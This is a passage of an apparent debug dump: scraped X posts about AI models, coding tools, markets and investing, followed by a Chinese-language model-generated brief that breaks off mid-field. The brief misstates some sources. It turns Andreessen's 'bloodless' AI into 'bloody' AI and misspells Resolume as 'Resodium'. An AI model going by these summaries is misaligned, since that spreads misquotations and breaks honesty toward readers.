"说个冷知识\n\n云服务厂商还是很有投资眼光的\n\n原价或者加价买了H100,现在还能卖那个价,甚至更高\n\n另外他还能出租5年保修期内的机器\n\n这不妥妥当下最具价值的投资品类嘛", "url": "https://x.com/GoSailGlobal/status/2049307192692781200"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-29T01:56:48+00:00", "title": "R to @charliebilello: x.com/charliebilello/status/…", "url": "https://x.com/charliebilello/status/2049306875301130507"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-29T01:55:58+00:00", "title": "RT by @elonmusk: #BREAKING: Chairman @Jim_Jordan invites Southern Poverty Law Center Interim CEO and President Bryan Fair to testify publicly on Wednesday, May 20, 2026, at 10:00 a.m.", "url": "https://x.com/elonmusk/status/2049306669352358192"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-29T01:55:13+00:00", "title": "US home prices increased 0.7% over the last year, the slowest growth rate since June 2023. There are currently a record 46% more sellers than buyers nationally. Absent manipulation from the Federal Government/Reserve, prices will come down and homes will become more affordable.", "url": "https://x.com/charliebilello/status/2049306480071873011"}, {"handle": "dingyi", "name": "Ding", "published_at": "2026-04-29T01:47:21+00:00", "title": "Ghostty 离开 GitHub,同一天 Warp 宣布开源。\n\nWarp 一直以来都很好用,但越来越臃肿,性能也差点意思,但对不会命令行的非程序员非常友好,这次开源可以说是一个重大转折点,没准半年后各种 Warp 变体都会出现了。\n\n还有,Warp 现在的垂直 tab 就比基于 Ghostty 的那些 Cmux 好用多了,期待未来出现更多好用的终端!", "url": "https://x.com/dingyi/status/2049304499093946475"}, {"handle": "gkxspace", "name": "余温", "published_at": "2026-04-29T01:38:07+00:00", "title": "R to @gkxspace: 大家的重点不应该放在“六个月”、“不需要人”\n\n技术的迭代速度很快,现在可以10个人变成5个,或许六个月、也或许一年后可能变成1个,直到完全不需要人来做各种重复性工作\n\n更应该关注的是找到自身的价值,在这波AI浪潮里有属于自己的独特性", "url": "https://x.com/gkxspace/status/2049302176900501544"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-29T01:24:00+00:00", "title": "\"SBC becomes a problem when stock prices fall and dilution explodes.\n\nWhat was 3% annual dilution can quickly become 10%, creating a downward spiral that is hard to escape.\n\nThe fix is to be far more selective, give equity to the top performers who drive value, and pay the rest i", "url": "https://x.com/HarryStebbings/status/2049298621951058341"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-29T01:23:28+00:00", "title": "Since the start of the Iran war...\nJet Fuel: +70%\nSulfur: +60%\nBrent Crude Oil: +52%\nHeating Oil: +52%\nWTI Crude Oil: +48%\nUrea: +48%\nDiesel: +45%\nGasoline: +40%\nEuropean Nat Gas: +36%\nFertilizer: +23%\nPalm Oil: +12%\nCoal: +11%\nWheat: +10%\nIron Ore: +8%\nS&P 500: +4%\n$VIX: -10%", "url": "https://x.com/charliebilello/status/2049298490489004357"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-29T01:22:14+00:00", "title": "RT by @GoSailGlobal: 我和张凯的GEO论文,在全球最大的论文平台http://arxiv.org完成审核并正式发布\n这应该是全球第二篇与GEO有关的专项论文\n\n论文基于今年3月份最新的数据,包括602条 Prompt、21143 条引用、23745条AI抓取记录,最终形成的一版正式的GEO专项研究报告,欢迎查阅\n\n如果对大家能有帮助,我们打算后面继续抓取更多的数据,进行专项研究并开放研究成果\n\n网页地址:https://arxiv.org/abs/2604.25707\n论文PDF:https://arxiv.org/pdf/2604.", "url": "https://x.com/GoSailGlobal/status/2049298176935690588"}, {"handle": "Pluvio9yte", "name": "雪踏乌云", "published_at": "2026-04-29T01:17:10+00:00", "title": "搭配收集免费模型的开源项目 使用这篇文章更佳\n\nhttps://github.com/cheahjs/free-llm-api-resources", "url": "https://x.com/Pluvio9yte/status/2049296905382035945"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-29T01:16:51+00:00", "title": "RT by @elonmusk: Following future rollout of FSD V14 Lite for HW3 vehicles in the US, we plan on expanding V14 Lite to additional international markets.\n\nThis update ensures that HW3 vehicle owners will continue to benefit from ongoing software updates.\n\nSince international rollo", "url": "https://x.com/elonmusk/status/2049296822162874685"}, {"handle": "realNyarime", "name": "奶昔", "published_at": "2026-04-29T01:15:23+00:00", "title": "昨天试着申请了小米百万亿Token补贴,也收到了雷总送的7亿token,有效期一个月\n支持OpenAI和Anthropic端点,也有提供Claude Code等AI软件接入文档,看得出MiMo团队很用心在做这个事情\n\n接下来一个月,我会用MiMo V2.5对接OpenClaw尝试Vibe一个项目并开源,也期待国产LLM越做越好!", "url": "https://x.com/realNyarime/status/2049296454905393361"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-29T01:07:12+00:00", "title": "Big Zesty 💪", "url": "https://x.com/jason/status/2049294394075849059"}, {"handle": "Pluvio9yte", "name": "雪踏乌云", "published_at": "2026-04-29T01:02:14+00:00", "title": "x.com/i/article/204914647001…", "url": "https://x.com/Pluvio9yte/status/2049293145670836459"}, {"handle": "svwang1", "name": "王川(硅谷)", "published_at": "2026-04-29T00:48:58+00:00", "title": "旧金山湾区的地铁站花了九千万美元在入口处加了高高的门,这样逃票变得非常困难。不仅每年增加了一千万美元收入,而且地铁变得更加干净安全,之前要做的各种清理工作减少了 95%。\n\n和外界交往的过程中,增加各种严格的过滤筛选机制,是保护自己,提高效率的一个重要必备的措施。因为成本的原因而对外不设防,就是准备把自己变成垃圾场。", "url": "https://x.com/svwang1/status/2049289806241550791"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-29T00:23:52+00:00", "title": "RT by @elonmusk: Ookla says @Starlink has been a game-changer for inflight Wi-Fi speeds. Their new report ranks which airline has the fastest Wi-Fi:\n\n\"Starlink stood out for its speed. Of over 50 airlines evaluated, the eight airlines that exceeded 100 Mbps median download speed ", "url": "https://x.com/elonmusk/status/2049283488600277368"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-29T00:09:36+00:00", "title": "RT by @elonmusk: Super high bandwidth to commercial aircraft with @Starlink", "url": "https://x.com/elonmusk/status/2049279898976702535"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-29T00:05:58+00:00", "title": "Oh lordy... here comes the lawfare madness again 🤦\n\n86 when I grew up in the restaurant business meant “to get rid of” something (ie “86 clams” meant to take clams off the menu). \n\nI was told it had two origins:\n\n1. 86 Chumley's, which was the address of the speakeasy in Manhatta", "url": "https://x.com/jason/status/2049278984513310783"}, {"handle": "lxfater", "name": "铁锤人", "published_at": "2026-04-29T00:05:46+00:00", "title": "看来草莓问题和洗车问题很经典了,ChatGPT都在测试", "url": "https://x.com/lxfater/status/2049278935897186512"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-29T00:05:00+00:00", "title": "\"No, layoffs alone will not fix the problem.\n\nIf a company has become bloated, simply cutting 50% often just leaves you with half the same mediocrity.\n\nThe real issue is culture and talent quality, and fixing that usually requires a full rebuild, which is extremely hard, especial", "url": "https://x.com/HarryStebbings/status/2049278741583643076"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-28T23:51:30+00:00", "title": "Not investment advice…. but WERE AT A FOUR YEAR HIGH AND WE CRUSHED EARNINGS 😂😂🤦😂😂\n\nNever change Philly!!!", "url": "https://x.com/jason/status/2049275346109796388"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T23:51:17+00:00", "title": "Google Gemma 官方教你本地跑 Coding Agent!\n\n本地完美组合来了:\n• Pi Agent\n• Gemma 4 26B 模型\n• LM Studio / Ollama / llama.cpp 等 serving engine\n\n完全离线运行、零 API 费用、100% 隐私保护、零延迟!本地开发者 Agentic 开发神器!\n\n附 @patloeber 详细一步步搭建教程👇\nhttps://patloeber.com/gemma-4-pi-agent/", "url": "https://x.com/berryxia/status/2049275291164692726"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-28T23:50:25+00:00", "title": "Lock in, GAME FIVE, @knicks fam!\n\n@BenStiller @jalenbrunson1 @Arifromanhattan \"\">@CPTheFanchise @jerryferrara @MrChuckD\n@RealChalamet @fredwilson @msavino\n@JDSportsTalkNY @nihalmehta @WorldWideWob\n@BillSimmons😂@JesseItzler @ajv 📷 @duglust @ischafer @sirgutz @Traticaster101 \n\nHow", "url": "https://x.com/jason/status/2049275070800150851"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T23:46:25+00:00", "title": "🚀 OpenBMB 重磅发布!MiniCPM-o 4.5 技术报告来了!\n\n9B 参数多模态模型实现突破性实时交互:\n\n• Omni-Flow 框架:原生全双工流式交互(视频+音频+文本毫秒级同步)\n\n• Native Full-Duplex + Proactive Interaction(无需VAD,可主动提醒)\n\n• 多模态基准接近 Gemini 2.5 Flash(MMBench 87.6 / MathVista 80.1)\n\n• 极致 Edge AI:完全离线运行,一键安装 Windows / macOS(12G VRAM 即可)\n\n• 100%", "url": "https://x.com/berryxia/status/2049274065610027362"}, {"handle": "runes_leo", "name": "Leo", "published_at": "2026-04-28T23:38:00+00:00", "title": "之前一直没搞清楚 GitHub 通知是怎么工作的。Star / Watch 各档到底推什么?摸清楚才发现很多人(包括我)一直在误解:star 根本不触发通知。\n\n- Star ⭐ = 书签,零通知\n- Watch (All Activity) = issue / PR / release / discussion / commit 评论,但单纯 push 不推\n- Watch (Releases only) = 只有打 tag 发 release 才推\n\n所以 star 在机制层就是个公开的\"值得存一下\"标签,不是订阅、不反映使用、甚至不代表看过。每次 ", "url": "https://x.com/runes_leo/status/2049271946022474215"}, {"handle": "dingyi", "name": "Ding", "published_at": "2026-04-28T22:59:18+00:00", "title": "我去有人知道这是哪位大神设计的吗?@FateTell 应该是今年看到的设计最精美又好玩的 iOS app 了 !算命 + AI 结合很有创意,细节打磨的也相当好。哪怕你对八字之前不感兴趣,我也建议下载一个把玩一下。看多了千篇一律 vibe 的产品,突然看到这个真的让人眼前一亮啊。\n\nhttps://fatetell.com/zh-CN/invite?referral=QQE5QT", "url": "https://x.com/dingyi/status/2049262208241332358"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T22:51:25+00:00", "title": "R to @berryxia: GitHub:https://github.com/harflabs/SwiftVLC\n\n```", "url": "https://x.com/berryxia/status/2049260222863266206"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T22:51:22+00:00", "title": "这个老哥 写的SwiftVLC 正式开源啦!🔥\n\n现代 Swift 6 对 libVLC 的高质量 wrapper(驱动 Tilfaz 应用):\n\n• 直接 C bindings,无 Objective-C 桥接 \n• 严格并发支持(Strict Concurrency) \n• 专为 SwiftUI 量身打造 \n• 支持 iOS、macOS、tvOS、Mac Catalyst \n\n附带完整 Showcase App(40 个案例)和详细 DocC 文档!", "url": "https://x.com/berryxia/status/2049260211895185445"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T22:48:37+00:00", "title": "GPT2 真的成精了!的确!\n小小东老哥整的这套提示词很不错,推荐大家!", "url": "https://x.com/berryxia/status/2049259518027276559"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-28T22:48:24+00:00", "title": "RT by @elonmusk: The California Coastal Commission has issued a formal apology to @elonmusk and SpaceX, adding that it will not consider political views or speech in future regulatory decisions.\n\n• The Commission admits some officials made politically biased and improper statemen", "url": "https://x.com/elonmusk/status/2049259466973933764"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T22:31:31+00:00", "title": "3D 网格生成重磅突破!SATO 来了!\n\n• 从点云(Point Clouds)直接生成完整网格 \n• Strip-based tokenization,实现超干净边缘流与结构 \n• 原生 UV segmentation 直接 baked into 生成过程 \n• 单个模型同时支持三角网格 + 四边形网格", "url": "https://x.com/berryxia/status/2049255217603178794"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-28T22:28:53+00:00", "title": "If this passes, what impact (if any) do you think @RoKhanna’s $25 minimum wage will have on unemployment rate in California? \n\nShow your work.", "url": "https://x.com/jason/status/2049254554550653047"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T22:26:54+00:00", "title": "我靠!兄弟们?Warp 都要开源了!\n\n官方宣布Warp 正式全面开源啦!🔥\n\n知名现代终端 + Agentic 开发环境 Warp 现在完全开源!\n\n• 代码、Roadmap、贡献流程全部开放\n• GitHub:https://github.com/warpdotdev/warp\n• Oz AI agents(GPT 驱动)负责 coding、planning、testing\n• OpenAI Devs 担任 founding sponsor\n\n开发者福音!\n欢迎社区一起共建下一代终端工具 🚀", "url": "https://x.com/berryxia/status/2049254052840812960"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-28T22:24:00+00:00", "title": "\"You cannot have only A players in every role, some functions are just there to keep the business running.\n\nBut you can build a team where the people you keep are the highest performers in those roles.\n\nA players thrive when surrounded by other strong performers, but they get dra", "url": "https://x.com/HarryStebbings/status/2049253323329704378"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T22:22:48+00:00", "title": "NVIDIA 重磅发布!🚀 \n\nNemotron 3 Nano Omni 多模态开源模型来了!\n\n🔥 30B 参数\n🔥 256K 超长上下文\n🔥 最高效开放多模态模型(语言+视觉+语音+视频+音频一体化)\n🔥 专为 subagents / Agentic 任务设计\n🔥 完全开源(权重 + 数据 + 配方),领跑多项榜单\n\n可通过 NVIDIA NIM API 免费试用!完美 powering 多代理工作流。", "url": "https://x.com/berryxia/status/2049253021159403786"}, {"handle": "svwang1", "name": "王川(硅谷)", "published_at": "2026-04-28T22:20:52+00:00", "title": "人写的文章像面条,再乱,最终还是可以梳理出头绪。ai 写的文章像一锅粥,最后不知所云。", "url": "https://x.com/svwang1/status/2049252535689757003"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T22:20:51+00:00", "title": "Apple Vision Pro “首次”用于真实手术!👀 世界首例白内障手术诞生!\n\n这里我补充一下其实AVP在几年前刚出来那会就已经有国内沈阳那边的医院用于做手术,国内北大好像也有并非首例!\n\n纽约 SightMD 眼科医生 Dr. Eric Rosenberg 使用 Apple Vision Pro + ScopeXR 混合现实平台,于2025年10月完成全球首例,至今已成功实施数百例。\n\n支持3D立体显微视野、实时数据叠加 + 远程专家协作,空间计算正式进入手术室!\n\n```", "url": "https://x.com/berryxia/status/2049252532015579248"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T22:13:55+00:00", "title": "R to @berryxia: huggingface.co/poolside/Lagu…", "url": "https://x.com/berryxia/status/2049250788422353142"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T22:13:37+00:00", "title": "前Github CTO team带着新模型来了!\n\n他们的Poolside AI 团队刚刚开源了他们的首个权重模型!\n\n模型名称 Laguna XS.2\n• 33B total / 3B active MoE\n• Apache 2.0 完全开源\n• 专为 Agentic Coding + 长时序任务设计\n• 单张 GPU 即可流畅运行\n\n同时发布 Laguna M.1(当前最强版)和 Agent Harness。\n\n由前 GitHub CTO Jason Warner 创立的团队,coding agent 赛道新力量!\n\n```", "url": "https://x.com/berryxia/status/2049250710492160228"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T22:10:16+00:00", "title": "🚀 视频模型其实早就懂3D了!\n\n微软World-R1用RL直接唤醒,无需改架构、无视频训练数据、无额外推理成本!\n\n1. 把相机轨迹嵌入扩散噪声,零额外模块\n\n2. 用Depth Anything 3 + Qwen3-VL做3D几何评判器\n\n3. 周期性解耦训练,建筑保持刚性、旗帜依然飘动\n\n4. 仅用3K条文本提示完成训练,效果惊人\n\n视频生成迈向真实世界模拟的关键一步!\n\n项目地址:\nhttps://github.com/microsoft/World-R1", "url": "https://x.com/berryxia/status/2049249868376604931"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T22:02:28+00:00", "title": "Claude 重磅连接创意专业工具!\n\n全新 Blender 和 Autodesk Fusion 连接器上线,通过对话直接调试场景、构建工具、修改3D模型,创意工作流直接搞起来!\n\n1. Blender 连接器:调试场景、批量应用变化、构建新工具,全在 Claude 中完成\n\n2. Autodesk Fusion 连接器:通过自然对话创建和修改3D模型,设计师和工程师效率拉满\n\n3.同日上线更多连接器:Adobe Creative Cloud、Ableton、Splice、Canva \nAffinity、SketchUp、Resolume\n\n4. 正式加", "url": "https://x.com/berryxia/status/2049247904536428805"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-28T21:46:18+00:00", "title": "Wow. Musk’s lawyers will capitalize on this.", "url": "https://x.com/GaryMarcus/status/2049243836359254025"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-28T21:44:35+00:00", "title": "From what I can tell, Elon Musk just stepped on his own toes at the trial, making it all about him instead of the promises Altman and Brockman broke.\n\nOpenAI will slay his ego on cross. \n\nHe should have made it about them.\n\n(reporting from @MikeIsaac at NYT)", "url": "https://x.com/GaryMarcus/status/2049243406380237116"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-28T21:37:05+00:00", "title": "Image", "url": "https://x.com/sama/status/2049241518540808440"}, {"handle": "ylecun", "name": "Yann LeCun", "published_at": "2026-04-28T21:36:28+00:00", "title": "RT by @ylecun: What a week at @iclr_conf in Rio 🇧🇷 !\n\nAs my first conference, it would have been hard to ask for a better experience 😍. I had the chance to present two papers:\n- EB-JEPA https://github.com/facebookresearch/eb_jepa: Presented as an Oral 🏅 (top ~3% of papers) at the", "url": "https://x.com/ylecun/status/2049241361266684288"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-28T21:21:16+00:00", "title": "I am worried by the constraining exit options for venture backed companies: \n\n1. IPOs: You can’t IPO with less than $500M in revenue and even then, it’s not a slam dunk. Everyone that has so far has been a s*** IPO. \n\n2. Acquisition by Incumbent: Yes but they are so specific. Ver", "url": "https://x.com/HarryStebbings/status/2049237538901020767"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-28T21:12:19+00:00", "title": "wow y'all love 5.5\n\nwe should think of something nice to do to celebrate!", "url": "https://x.com/sama/status/2049235284655780000"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-28T21:06:51+00:00", "title": "RT by @GaryMarcus: As an avid cyclist, I was amused to see ChatGPT's “powerful new image engine\" draw a bicycle with the \"brake\" label pointing to empty space where brakes are sometimes found on other bicycles. The point of these AI fails (regularly collected by @garymarcus) is n", "url": "https://x.com/GaryMarcus/status/2049233910266278250"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-28T20:39:11+00:00", "title": "We're in Stockholm. You know how there are some places where you think \"Nice place to visit, but I wouldn't want to live there\"? Stockholm is the kind of place that makes you want to live there.", "url": "https://x.com/paulg/status/2049226946471489602"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-28T20:35:56+00:00", "title": "There are some real bombshells in this one.", "url": "https://x.com/paulg/status/2049226128603172949"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-28T20:32:16+00:00", "title": "\"He just doesn't listen to me. Just like you.\"\n\n— Jessica on our younger son", "url": "https://x.com/paulg/status/2049225204132421727"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-28T20:31:00+00:00", "title": "Do the majority of company teams need to be rebuilt for the technology we have today?\n\n\"Yes, teams need to be rebuilt for the AI era.\n\nIf roles are going to be automated or not adapting fast enough, you have to redesign the org from scratch based on what is possible today.\n\nThe c", "url": "https://x.com/HarryStebbings/status/2049224886128722345"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-28T20:26:28+00:00", "title": "Image", "url": "https://x.com/pmarca/status/2049223746368483370"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-28T20:20:22+00:00", "title": "“YouTube videos about AI, but with no soyface”", "url": "https://x.com/pmarca/status/2049222212008206717"}, {"handle": "JeffDean", "name": "Jeff Dean", "published_at": "2026-04-28T20:16:21+00:00", "title": "Google Translate is turning 20! 🎉. There are 20 fun facts and tips in the thread below.\n\nTranslate is one of my favorite Google products because it brings us all closer together!\n\nI've been involved with a couple of things over the years. The first was our deployment of the initi", "url": "https://x.com/JeffDean/status/2049221200321380805"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-28T19:59:07+00:00", "title": "There are five things you can focus on in your life that will help you lead a balanced and fulfilling life.", "url": "https://x.com/jason/status/2049216863574364182"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-28T19:58:37+00:00", "title": "If you're feeling unbalanced in your life, I highly recommend checking in on my big five.", "url": "https://x.com/jason/status/2049216735912329567"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-28T19:55:41+00:00", "title": "We're all standing on the shoulders of Adam Curry and Dave Weiner.", "url": "https://x.com/jason/status/2049215999795138656"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-28T19:54:02+00:00", "title": "RT by @Jason: Peter Thiel: “We’ve tried to do too much investing in Europe. It’s always sort of a junket.”\n\n“It’s a nice place to go on vacation as an investor.”\n\n“It’s a very strange thing—the US is somehow still the country where people do new things.”\n\nVia @theallinpod", "url": "https://x.com/jason/status/2049215583351341460"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-28T19:52:16+00:00", "title": "AutoLane is my next uber.", "url": "https://x.com/jason/status/2049215140810072429"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-28T19:52:00+00:00", "title": "The future is autonomous, and auto lane is going to play a major role in managing autonomy for giant parking lots!\n\nHighly recommend listening to this podcast to understand what the future will look like.", "url": "https://x.com/jason/status/2049215070970814469"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-28T19:51:11+00:00", "title": "What album or two do you have in deep rotation at the moment?\n\nIt could be from the archives or it could be a brand new selection.", "url": "https://x.com/jason/status/2049214864912978399"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-28T19:48:10+00:00", "title": "RT by @charliebilello: Tomorrow's News Today...\n\nBREAKING: NO CHANGE. THE FED HOLDS INTEREST RATES STEADY AT 3.50-3.75%, CITING CONTINUED UNCERTAINTY OVER THE WAR IN IRAN AND ITS IMPACT ON ECONOMIC GROWTH AND INFLATION.", "url": "https://x.com/charliebilello/status/2049214106352107778"}, {"handle": "runes_leo", "name": "Leo", "published_at": "2026-04-28T19:30:02+00:00", "title": "vision pro 连 mac 开带鱼屏,Polymarket 盯赔率变化,Codex 跑策略代码,再开个窗口看直播,get 到了新的看球姿势,提前为世界杯做准备😂", "url": "https://x.com/runes_leo/status/2049209546091253870"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-28T19:01:24+00:00", "title": "Thoughtful book on LLMs and linguistics — by someone who actually knows linguistics.", "url": "https://x.com/GaryMarcus/status/2049202338209079574"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-28T18:53:59+00:00", "title": ".@ZohranKMamdani is about to kill the Golden Goose", "url": "https://x.com/jason/status/2049200471651353064"}, {"handle": "CuiMao", "name": "CuiMao", "published_at": "2026-04-28T18:44:13+00:00", "title": "干爹发新模型了!\n属于Nemotron 3 系列中的多模态版本。可以文本、图像、视频、音频的统一理解与推理,专为Agentic AI设计,特别适合给多模态感知子代理用,我来试试给Hermes用用看,", "url": "https://x.com/CuiMao/status/2049198015232315465"}, {"handle": "Pluvio9yte", "name": "雪踏乌云", "published_at": "2026-04-28T18:42:36+00:00", "title": "这份提示词感觉用处很多,除了自己写文章当封面,哪天公司要做海报之类的用来小装一手也很有用的🤓\n\n话不多说,看图。提示词见引用文章。", "url": "https://x.com/Pluvio9yte/status/2049197606619017697"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-28T18:33:33+00:00", "title": "might not be accurate for much longer...", "url": "https://x.com/jason/status/2049195328092471563"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-28T18:28:00+00:00", "title": "The Best Founders are Not Motivated by Money:\n\n\"Founders don't tend to be motivated by money as well.\nThe best are motivated by personal growth development, being inspired, finding things intellectually stimulating, and winning.\n\nBut it never tends to be money. Money is a very to", "url": "https://x.com/HarryStebbings/status/2049193932144164986"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-28T18:27:56+00:00", "title": "The AI we thought we’d get was bloodless alien machine intelligence. The AI we actually got was the complete knowledge and culture of our civilization reflected back at us. Of course we will love it deeply.", "url": "https://x.com/pmarca/status/2049193915249574141"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-28T18:25:59+00:00", "title": "Many such cases?", "url": "https://x.com/pmarca/status/2049193427120603173"}] diff --git a/data/x_brief/debug/20260429_171514_l1_stage2_output.json b/data/x_brief/debug/20260429_171514_l1_stage2_output.json new file mode 100644 index 0000000..d9b18cf --- /dev/null +++ b/data/x_brief/debug/20260429_171514_l1_stage2_output.json @@ -0,0 +1,249 @@ +{ + "raw_text": "\n\n{\"headline\":\"OpenAI全云部署+Claude/MCP连接器爆发,AI编程工具生态进入\\\"agent网络\\\"新时代\",\"themes\":[{\"id\":\"t1\",\"title\":\"AI 编程工具生态爆发:多连接器 + 多 Agent 协同\",\"subtitle\":\"Cursor 3.2、Claude Blender/Fusion连接器、Mozilla统一接口同天上架,agent正在从单点工具进化为可协作的网络\",\"bullets\":[\"Cursor 3.2发布:支持/multitask并行子Agent + 跨仓库多根工作区;GPT-5.5登顶CursorBench达72.8%,50%折扣持续至5月2日\",\"Claude新增9个创意工具MCP:Blender、Autodesk Fusion、Adobe Creative Cloud、Ableton、Splice、Canva、Affinity、Sketchup、Resodium\",\"Mozilla发布any-llm:统一接口连接所有LLM provider,挑战LiteLLM,发布首日即获1928 stars\",\"前GitHub CTO团队开源Laguna:33B参数MoE模型,专为Agentic Coding设计,单GPU可运行\"],\"samples\":[{\"text\":\"Cursor 3.2支持/multitask并行子Agent,GPT-5.5登顶CursorBench\",\"url\":\"https://x.com/cursor_ai/status/2047764651363180839\",\"handle\":\"cursor_ai\",\"date\":\"2026-04-24\"},{\"text\":\"Mozilla any-llm统一接口连接所有LLM provider\",\"url\":\"https://x.com/GoSailGlobal/status/2049327853469310984\",\"handle\":\"GoSailGlobal\",\"date\":\"2026-04-29\"},{\"text\":\"Claude MCP连接器爆发:Blender/Fusion等9个创意工具上架\",\"url\":\"https://x.com/berryxia/status/2049247904536428805\",\"handle\":\"berryxia\",\"date\":\"2026-04-28\"}]},{\"id\":\"t2\",\"title\":\"OpenAI全云部署 + 开源模型军备竞赛\",\"subtitle\":\"微软合作升级解除云限制;Moonshot Kimi k2.6发布;NVIDIA Nemotron Omni开源;国产模型token价格战开打\",\"bullets\":[\"OpenAI更新与微软合作:微软仍是主要云伙伴,但OpenAI产品现已可在所有云上使用\",\"Perplexity将GPT-5.5设为默认编排模型,Kimi k2.6成开源SOTA;NVIDIA Nemotron 3 Nano Omni开源,30B参数支持5种模态\",\"小米推出百万亿token补贴计划;罗福莉团队送100T tokens grant,表单对中文builder极友好\"],\"samples\":[{\"text\":\"OpenAI全云部署,解除微软绑定\",\"url\":\"https://x.com/sama/status/2048755148361707946\",\"handle\":\"sama\",\"date\":\"2026-04-27\"},{\"text\":\"Perplexity用GPT-5.5编排,Kimi k2.6成开源SOTA\",\"url\":\"https://x.com/AravSrinivas/status/2047753276888854595\",\"handle\":\"AravSrinivas\",\"date\":\"2026-04-27\"},{\"text\":\"NVIDIA Nemotron 3 Nano Omni开源:30B参数5模态Agent专用\",\"url\":\"https://x.com/berryxia/status/2049253021159403786\",\"handle\":\"berryxia\",\"date\":\"2026-04-28\"}]},{\"id\":\"t3\",\"title\":\"AI投资与生存指南:vc视角的务实判断\",\"subtitle\":\"Paul Graham:避开前沿实验室的\\\"blast radius\\\";Marc Andreessen:AI是文明知识的镜像而非外星机器智能\",\"bullets\":[\"Paul Graham:前沿实验室确实在高速发布,但初创公司可以避开它们的攻击范围,关键在于选择正确的细分领域\",\"Marc Andreessen:预期的AI是血腥的外星机器智能,实际得到的AI是我们文明知识和文化的全面镜像,当然会深深爱上它\",\"Harry Stebbings:单纯裁员不能解决问题,文化和人才质量才是核心,需全体系重建\"],\"samples\":[{\"text\":\"PG对创始人建议:避开前沿实验室攻击范围\",\"url\":\"https://x.com/paulg/status/2049333482271260710\",\"handle\":\"paulg\",\"date\":\"2026-04-29\"},{\"text\":\"Marc Andreessen:AI是文明知识的镜像\",\"url\":\"https://x.com/pmarca/status/2049193915249574141\",\"handle\":\"pmarca\",\"date\":\"2026-04-28\"},{\"text\":\"Harry Stebbings:裁员不能解决问题,需重建文化和人才\",\"url\":\"https://x.com/HarryStebbings/status/2049278741583643076\",\"handle\":\"HarryStebbings\",\"date\":\"2026-04-29\"}]}],\"p0_events\":[{\"id\":\"p01\",\"title\":\"Cursor 3.2 /multitask + GPT-5.5可用\",\"meta\":\"cursor_ai | 2026-04-24\",\"summary\":\"Cursor 3.2新增4大功能:/multitask并行子Agent、多根工作区(跨仓库修改)、GPT-5.5登顶CursorBench 72.8%,50%折扣至5月2日\",\"url\":\"https://x.com/cursor_ai/status/2047764651363180839\"},{\"id\":\"p02\",\"title\":\"Claude MCP连接器爆发:Blender/Fusion等9个创意工具上架\",\"meta\":\"berryxia | 2026-04-28\",\"summary\":\"Anthropic同日发布9个MCP连接器,包括Blender(自然语言操控Python API)、Autodesk Fusion、Adobe Creative Cloud等,创意工作流可直接在Claude中完成\",\"url\":\"https://x.com/berryxia/status/2049247904536428805\"},{\"id\":\"p03\",\"title\":\"OpenAI全云部署,解除微软绑定\",\"meta\":\"sama | 